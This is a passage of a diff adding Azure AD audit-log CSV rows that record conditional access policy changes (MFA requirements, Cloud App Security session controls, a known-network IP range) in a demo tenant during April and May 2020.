+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:40 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:40 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-05T06:21:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:40 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:08:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:08:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:08:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:08:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:08:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-28T06:09:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:08:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:08:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:09:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:09:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-28T06:08:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/28/2020 6:08:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:48 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:47 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/24/2020 6:00:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-24T06:00:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
